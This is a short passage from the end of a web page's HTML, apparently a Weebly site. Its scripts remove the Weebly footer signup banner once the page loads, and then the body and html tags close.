        element.parentNode.removeChild(element);
      }, false);

    </script>

    <script>
      document.addEventListener('DOMContentLoaded', function() {
        var element = document.getElementById("weebly-footer-signup-container-v3");
        element.parentNode.removeChild(element);
      }, false);

    </script>


    <div id="wsite-menus" bis_skin_checked="1"></div>
  </body>

</html>
